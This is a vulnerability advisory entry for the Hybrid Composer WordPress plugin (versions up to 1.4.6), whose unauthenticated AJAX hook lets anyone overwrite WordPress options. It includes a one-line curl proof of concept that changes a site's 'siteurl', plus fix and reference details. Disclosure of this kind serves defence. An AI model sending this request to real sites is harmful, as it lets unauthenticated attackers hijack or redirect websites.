Hybrid Composer <= 1.4.6 – Unauthenticated Options Update

Description

This plugin has a function to update Wordpress options via Ajax and it's set with the following:
add_action('wp_ajax_nopriv_hc_ajax_save_option', 'hc_ajax_save_option');

Which means it does not require authentication and is exploitable by anyone on the internet.

I've already spoken to the plugin author about this and he has patched the plugin and notified his users.

http://wordpress.framework-y.com/hybrid-composer/

Proof of Concept

curl -X POST -d "option_name=siteurl&content=https://www.google.com" 'https://DOMAIN.COM/wp-admin/admin-ajax.php?action=hc_ajax_save_option'

Affects Plugins

hybrid-composer

Fixed in 1.4.7

References

Exploitdb

47154

URL

https://labs.sucuri.net/wptf-hybrid-composer-unauthenticated-arbitrary-options-update/

Miscellaneous

Original Researcher

rootetsy

Submitter

Brad Patton

Verified

Yes

WPVDB ID

1d31379f-b935-4ee6-9aea-dbc4733e54d2

Timeline

Publicly Published

2019-07-10 (about 6 years ago)

Added

2019-07-12 (about 6 years ago)

Last Updated

2019-11-27 (about 6 years ago)

Other

Published

Title

Published

2017-01-04

Title

Stop User Enumeration <= 1.3.4 - Username Enumeration Bypasses

Published

2019-01-25

Title

Total Donations - Update Arbitrary WordPress Option Values

Published

2020-01-27

Title

WPS Hide Login < 1.5.5 - Secret Login Page Disclosure

Published

2020-03-04

Title

WooCommerce Smart Coupons < 4.6.5 - Unauthenticated Coupon Creation

Published

2022-11-09

Title

Better Messages < 1.9.10.71 - Subscriber+ Messaging Block Bypass